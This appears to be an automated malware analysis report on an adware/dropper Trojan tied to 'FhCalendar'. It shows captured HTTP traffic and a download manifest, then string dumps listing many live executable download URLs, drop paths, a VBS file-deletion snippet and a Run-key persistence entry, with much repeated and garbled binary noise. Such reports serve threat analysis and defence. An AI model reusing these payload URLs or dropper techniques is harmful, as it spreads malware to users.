{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"0d28db4036a945fd9e9761f04cd18d62","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....

GET /Api/GetHoliday.ashx HTTP/1.1

User-Agent: FhCalendar

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:01:23 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 876

{"errno":"1","info":[{"holidayname":"......","holiday":"2014-01-31","restday":"2014-01-31,2014-02-01,2014-02-02,2014-02-03,2014-02-04,2014-02-05,2014-02-06","work":"2014-01-26,2014-02-08"},{"holidayname":"......","holiday":"2014-01-01","restday":"2014-01-01","work":""},{"holidayname":".........","holiday":"2014-04-05","restday":"2014-04-05,2014-04-06,2014-04-07","work":""},{"holidayname":".........","holiday":"2014-05-01","restday":"2014-05-01,2014-05-02,2014-05-03","work":"2014-05-04"},{"holidayname":".........","holiday":"2014-06-02","restday":"2014-05-31,2014-06-01,2014-06-02","work":""},{"holidayname":".........","holiday":"2014-09-08","restday":"2014-09-06,2014-09-07,2014-09-08","work":""},{"holidayname":".........","holiday":"2014-10-01","restday":"2014-10-01,2014-10-02,2014-10-03,2014-10-04,2014-10-05,2014-10-06,2014-10-07","work":"2014-09-28,2014-10-11"}]}....

GET /Api/GetWeather.ashx?province=??&city=?? HTTP/1.1

User-Agent: FhCalendar

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:01:23 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 13

{"error":"0"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:01:23 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 13..{"error":"0"}..

GET /cms.gif?id=40490128&extendata= HTTP/1.1

Accept: */*

Referer: hXXp://dspcm.brand.sogou.com/qi

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: acookie.tanx.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: Tengine

Date: Sat, 14 Jun 2014 09:00:46 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"

Location: hXXp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=

31..GIF89a...................!.......,...........T..;..0..

GET /oemini/info.ini?id=41 HTTP/1.1

User-Agent: oemfhsli

Host: software.fhrlw.cn

HTTP/1.1 200 OK

Content-Length: 997

Content-Type: .ini

Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT

Accept-Ranges: bytes

ETag: "4415c5a0e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:47 GMT

[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..Hash0=31171D0C6216B1555E85D7EC89AF40F1..BlockSize1=204800..Hash1=E1AA7FC27B8979618CF31CD1CF06829B..BlockSize2=204800..Hash2=0C88B5B81B4BCDB92DDD042D79554E5E..BlockSize3=204800..Hash3=3CF42153EC58C3560A92DC9062CA08A6..BlockSize4=204800..Hash4=C3C74AB7AE92A4ACFEEE460E8AEA6C47..BlockSize5=204800..Hash5=0E120EA4DA635D3847459411AC6741E0..BlockSize6=204800..Hash6=D7C70FED90A30442DDAB5FCE3BDDB3A1..BlockSize7=204800..Hash7=654F71158BB01559F0A6D0DAC1318A3E..BlockSize8=204800..Hash8=8843F00044AF9C94DAFB599CFB583203..BlockSize9=204800..Hash9=9DD6488FBA152DA7B3C4DCECDF778EDA..BlockSize10=204800..Hash10=CC86E269AB6B2D6CB588D3F69C7D00B3..BlockSize11=174816..Hash11=CFE74D55CD85196E8D934D31902D9D1B..HTTP/1.1 200 OK..Content-Length: 997..Content-Type: .ini..Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT..Accept-Ranges: bytes..ETag: "4415c5a0e386cf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:00:47 GMT..[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..H

<<

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1832:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

.aspack

.aspack

.adata

.adata

t$(SSh

t$(SSh

~%UVW

~%UVW

u$SShe

u$SShe

kernel32.dll

kernel32.dll

user32.dll

user32.dll

EnumWindows

EnumWindows

ShellExecuteA

ShellExecuteA

http://software.fhrlw.cn/slience/fhsli_6_12001.exe

http://software.fhrlw.cn/slience/fhsli_6_12001.exe

C:/fhsli_6_12001.exe

C:/fhsli_6_12001.exe

C://fhsli_6_12001.exe

C://fhsli_6_12001.exe

http://ddl.9yfc.com/xxdd_165.exe

http://ddl.9yfc.com/xxdd_165.exe

C:/xxdd_165.exe

C:/xxdd_165.exe

C://xxdd_165.exe

C://xxdd_165.exe

http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe

http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe

C:/114gglm_016.exe

C:/114gglm_016.exe

C://114gglm_016.exe

C://114gglm_016.exe

http://dl.meinvkankan.com/goodpic_dae_627.exe

http://dl.meinvkankan.com/goodpic_dae_627.exe

C:/goodpic_dae_627.exe

C:/goodpic_dae_627.exe

C://goodpic_dae_627.exe

C://goodpic_dae_627.exe

http://lm.beilequ.com/update/365/365weatherIns_137.exe

http://lm.beilequ.com/update/365/365weatherIns_137.exe

C:/365weatherIns_137.exe

C:/365weatherIns_137.exe

C://365weatherIns_137.exe

C://365weatherIns_137.exe

http://home.yj005.com/JBDownload/jbist_[2018].exe

http://home.yj005.com/JBDownload/jbist_[2018].exe

C:/jbist_[2018].exe

C:/jbist_[2018].exe

C://jbist_[2018].exe

C://jbist_[2018].exe

http://down.duomi.com/DuomiMusic_V306.exe

http://down.duomi.com/DuomiMusic_V306.exe

C:/DuomiMusic_V306.exe

C:/DuomiMusic_V306.exe

C://DuomiMusic_V306.exe

C://DuomiMusic_V306.exe

http://down.shuyeer.net/dudu/dudu_b_55279.exe

http://down.shuyeer.net/dudu/dudu_b_55279.exe

C:/dudu_b_55279.exe

C:/dudu_b_55279.exe

C://dudu_b_55279.exe

C://dudu_b_55279.exe

http://dianxinshu.92ttz.com/download/setup_s1002.exe

http://dianxinshu.92ttz.com/download/setup_s1002.exe

C:/setup_s1002.exe

C:/setup_s1002.exe

C://setup_s1002.exe

C://setup_s1002.exe

http://qq2847894.b.xundisk.net/x1.exe

http://qq2847894.b.xundisk.net/x1.exe

c:/x1.exe

c:/x1.exe

c://x1.exe

c://x1.exe

http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe

http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe

C:/KXWebBox_3317_RBF.exe

C:/KXWebBox_3317_RBF.exe

C://KXWebBox_3317_RBF.exe

C://KXWebBox_3317_RBF.exe

bbs.125.la

bbs.125.la

tem.vbs

tem.vbs

fso.DeleteFile("

fso.DeleteFile("

Set fso = CreateObject("Scripting.FileSystemObject")

Set fso = CreateObject("Scripting.FileSystemObject")

F%*.*f

F%*.*f

CNotSupportedException

CNotSupportedException

commctrl_DragListMsg

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

Afx:%x:%x

COMCTL32.DLL

COMCTL32.DLL

CCmdTarget

CCmdTarget

__MSVCRT_HEAP_SELECT

__MSVCRT_HEAP_SELECT

RASAPI32.dll

RASAPI32.dll

GetProcessHeap

GetProcessHeap

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

USER32.dll

USER32.dll

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

WINMM.dll

WINMM.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

COMCTL32.dll

COMCTL32.dll

WS2_32.dll

WS2_32.dll

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

InternetCrackUrlA

InternetCrackUrlA

InternetCanonicalizeUrlA

InternetCanonicalizeUrlA

WININET.dll

WININET.dll

GetCPInfo

GetCPInfo

CreateDialogIndirectParamA

CreateDialogIndirectParamA

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

GetViewportExtEx

comdlg32.dll

comdlg32.dll

RegCreateKeyExA

RegCreateKeyExA

.PAVCException@@

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.prn)|*.prn|

(*.*)|*.*||

(*.*)|*.*||

Shell32.dll

Shell32.dll

Mpr.dll

Mpr.dll

Advapi32.dll

Advapi32.dll

User32.dll

User32.dll

Gdi32.dll

Gdi32.dll

Kernel32.dll

Kernel32.dll

(&07-034/)7 '

(&07-034/)7 '

?? / %d]

?? / %d]

%d / %d]

%d / %d]

: %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

(*.CUR)|*.CUR|

%s:%d

%s:%d

windows

windows

out.prn

out.prn

%d.%d

%d.%d

%d / %d

%d / %d

%d/%d

%d/%d

Bogus message code %d

Bogus message code %d

(%d-%d):

(%d-%d):

%ld%c

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

HTTP/1.0

%s <%s>

%s <%s>

Reply-To: %s

Reply-To: %s

From: %s

From: %s

To: %s

To: %s

Subject: %s

Subject: %s

Date: %s

Date: %s

Cc: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

%a, %d %b %Y %H:%M:%S

SMTP

SMTP

.PAVCObject@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCResourceException@@

.PAVCUserException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

.PAVCArchiveException@@

zcÁ

zcÁ

c:\%original file name%.exe

c:\%original file name%.exe

u.ht*D

u.ht*D

@u.Wj

@u.Wj

hhctrl.ocx

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

File%d

File%d

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

GDI32.DLL

GDI32.DLL

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

ddeexec

ddeexec

%s\ShellNew

%s\ShellNew

%s\DefaultIcon

%s\DefaultIcon

%s\shell\printto\%s

%s\shell\printto\%s

%s\shell\print\%s

%s\shell\print\%s

%s\shell\open\%s

%s\shell\open\%s

ECTrans.dll

ECTrans.dll

RegEnumKeyA

RegEnumKeyA

RegOpenKeyA

RegOpenKeyA

RegDeleteKeyA

RegDeleteKeyA

RegCreateKeyA

RegCreateKeyA

Backup\Backup.ini

Backup\Backup.ini

KINGSOFTFASTAIT3CHNEXEMUTEX

KINGSOFTFASTAIT3CHNEXEMUTEX

SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE

SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE

CChnEXEDoc

CChnEXEDoc

KPGs\*.KPG

KPGs\*.KPG

KPGMaker.exe

KPGMaker.exe

ChnEXE.chm

ChnEXE.chm

KPIs\*.KPI

KPIs\*.KPI

TEMPPE.WN

TEMPPE.WN

.?AVCToolCmdUI@@

.?AVCToolCmdUI@@

.?AVCStatusCmdUI@@

.?AVCStatusCmdUI@@

KERNEL32.DLL

KERNEL32.DLL

,),,,,**((%%!

,),,,,**((%%!

9111111113

9111111113

3111111111

3111111111

411111111111

411111111111

41111111111111

41111111111111

6%%%!!"'- :

6%%%!!"'- :

311111111111111

311111111111111

2611111111111111

2611111111111111

1(%%%%!!"

1(%%%%!!"

9111111111111111

9111111111111111

6%%%%!"'/ #=

6%%%%!"'/ #=

3111111111111111

3111111111111111

((%%%%!!

((%%%%!!

@%%%%!!"

@%%%%!!"

261111111111111111

261111111111111111

6(%%%%!!"

6(%%%%!!"

4111111111111111111

4111111111111111111

3111111111111111111

3111111111111111111

41111111111111111111

41111111111111111111

((%%%%!!"

((%%%%!!"

@(%%%%!!"

@(%%%%!!"

6(%%%%!"

6(%%%%!"

@(%%%!!"

@(%%%!!"

@%%%%!!!

@%%%%!!!

6%%%%!!"

6%%%%!!"

@%%%%!!!"

@%%%%!!!"

](%%%%!!"

](%%%%!!"

6%%%%!!!"

6%%%%!!!"

6%%%%!!!

6%%%%!!!

](%%%%!!!"

](%%%%!!!"

[---'%!!!"

[---'%!!!"

:--'%%!!!

:--'%%!!!

:-'%%%!!!

:-'%%%!!!

-'%%%%!!!

-'%%%%!!!

3%%%%!!!"

3%%%%!!!"

---44--- 42

---44--- 42

`.%%%%!!!"

`.%%%%!!!"

(111.3..3=>

(111.3..3=>

9.333//'.39>

9.333//'.39>

6%%%%!!'

6%%%%!!'

9/31111%.39>

9/31111%.39>

#### # ''

#### # ''

#### ##--

#### ##--

### $$4-

### $$4-

$$$# #-=

$$$# #-=

.%%%%!!!"

.%%%%!!!"

sssh~~h

sssh~~h

].%%%!!!""

].%%%!!!""

6%%%%!!""

6%%%%!!""

6%%%!!!""

6%%%!!!""

}|||}}mm}||sshkmm~~}}

}|||}}mm}||sshkmm~~}}

q___hh__sshkhh__s

q___hh__sshkhh__s

@%%%!!!""

@%%%!!!""

lexeetx

lexeetx

>?@?==?@@@

>?@?==?@@@

].!%!!!""

].!%!!!""

=@@???=@@@

=@@???=@@@

6%%!!!!""

6%%!!!!""

?@@???=@@@

?@@???=@@@

6%%!!!"""

6%%!!!"""

=@@??==?@@@

=@@??==?@@@

6%%!!!""

6%%!!!""

>?@???==@@@@

>?@???==@@@@

9%%!!!""

9%%!!!""

# '(%%%%!!%%!' 2>::444-9

# '(%%%%!!%%!' 2>::444-9

?%%!!!""

?%%!!!""

'%%%!!''''./>24:444 9[

'%%%!!''''./>24:444 9[

3%%!!!""

3%%!!!""

:.%!!!""

:.%!!!""

- 4-.FGHP

- 4-.FGHP

%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.

%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

portuguese-brazilian

portuguese-brazilian

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

operator

operator

S"S$S%S'S(S)S S,S-S/S0S1S2S3S4S5S6S7S8S<S><pre>U!U%U&U?</pre><pre>X"X#X%X&X'X(X)X X,X-X.X/X1X2X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXEXFXGXHXIXJXKXNXOXPXRXSXUXVXWXYXZX[X\X]X_X`XaXbXcXdXfXgXhXiXjXmXnXoXpXqXrXsXtXuXvXwXxXyXzX{X|X}X</X></pre><pre>_!_"_#_$_?</pre><pre>%d'd(d)d d.d/d0d1d2d3d5d6d7d8d9d;d<d>d@dBdCdIdKdLdMdNdOdPdQdSdUdVdWdYdZd[d\d]d_d`dadbdcdddedfdhdjdkdldndodpdqdrdsdtdudvdwd{d|d}d~d</d></pre><pre>"e#e$e&e'e(e)e*e,e-e0e1e2e3e7e:e<e><pre>"P%Q%R%S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r%s%</pre><pre>1 1!1"1#1$1%1&1'1(1)1</pre><pre>!0"0#0$0%0&0'0(0)0</pre><pre>% %!%"%#%$%%%&%'%(%)%*% %,%-%.%/%0%1%2%3%4%5%6%7%8%9%:%;%<%=%>%?%@%A%B%C%D%E%F%G%H%I%J%K%</pre><pre>W%f?i</pre><pre>e.lFO</pre><pre>}!}#}$}%}&}(})}*},}-}.}0}1}2}3}4}5}6}</pre><pre>urlsS</pre><pre>~ ~!~"~#~$~%~&~'~(~)~*~ ~,~-~.~/~0~1~2~3~4~5~6~7~8~9~?</pre><pre>u%urrGS</pre><pre>]']&].]$]</pre><pre>s"s9s%s,s8s1sPsMsWs`slsos~s</pre><pre>x<x%x><pre>{.{1{ {%{${3{>{</pre><pre>closeMiniUrl</pre><pre>closePopUrl</pre><pre>203.117.180.36</pre><pre>232,1!2@</pre><pre>e:\FhWork\Work\FhCalendar\Release\FhCalendar.pdb</pre><pre>KERNEL32.dll</pre><pre>GetKeyState</pre><pre>SetWindowsHookExW</pre><pre>UnhookWindowsHookEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>COMCTL32.dll</pre><pre>UrlUnescapeW</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>DuiLib_u.dll</pre><pre>WINMM.dll</pre><pre>WS2_32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>InternetCrackUrlW</pre><pre>InternetCanonicalizeUrlW</pre><pre>InternetOpenUrlW</pre><pre>WININET.dll</pre><pre>OLEACC.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>GetProcessHeap</pre><pre>CreateDialogIndirectParamW</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>WINSPOOL.DRV</pre><pre>COMDLG32.dll</pre><pre>RegCreateKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyW</pre><pre>RegEnumKeyW</pre><pre>.PAVCOleException@@</pre><pre>.PAVCException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCHttpFile@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCFileException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCInternetException@@</pre><pre>.?AVCMiniWebWnd@@</pre><pre>.?AVCPopWebWnd@@</pre><pre>.?AVCMD5@@</pre><pre>.?AVCMD5File@@</pre><pre>5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5*5)*4</pre><pre>!>qMRqqq=jqq;q@!!%dpRBepZpqeGe2!!</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>A%s (%s:%d)</pre><pre>%s (%s:%d)</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>Acomctl32.dll</pre><pre>Acomdlg32.dll</pre><pre>Ashell32.dll</pre><pre>http://</pre><pre>@WININET.DLL</pre><pre>mfcm90u.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl</pre><pre>user32.dll</pre><pre>accKeyboardShortcut</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>xbasicSetting.xml</pre><pre>subdivis.db</pre><pre>timedate.cpl</pre><pre>http://www.fhrlw.com</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>S_11.png</pre><pre>S_22.png</pre><pre>clocknote_list_item.xml</pre><pre>{b}%s{/b}</pre><pre>%d-d-d d:d</pre><pre>pg1_operation_small</pre><pre>pg1_operation_big</pre><pre>{c #808080}%d-d-d d:d{/c}</pre><pre>index.png</pre><pre>index_1.png</pre><pre>clock_note_setting.xml</pre><pre>xfhnotetip.xml</pre><pre>menu.xml</pre><pre>Update.exe</pre><pre>Updatb.exe</pre><pre>Update_bak.exe</pre><pre>FMTest.exe</pre><pre>\FMDLL32.dll</pre><pre>FMDLL32.dll</pre><pre>GetMsgProc</pre><pre>xfh.xml</pre><pre>http://client.fhrlw.com/ad/shopping.html?id=%d</pre><pre>Skin\warn.wav</pre><pre>pg2_web</pre><pre>data.db</pre><pre>info.db</pre><pre>note.ini</pre><pre>%d-d-d</pre><pre>%d/d/d</pre><pre>%c%d%d%d</pre><pre>http://client.fhrlw.com/ad/fixad.html?id=%d</pre><pre>%s(%d/d/d)</pre><pre>clock_del_nor.png</pre><pre>clock_del_hov.png</pre><pre>clock_del_push.png</pre><pre>finish_nor.png</pre><pre>finish_hov.png</pre><pre>finish_push.png</pre><pre>%d-%d-%d</pre><pre>%c%d%d</pre><pre>jintian3.png</pre><pre>huangli.xml</pre><pre>%d-01-01</pre><pre>%s{n}</pre><pre>{c #ff0000}%d{/c}</pre><pre>{n}{c 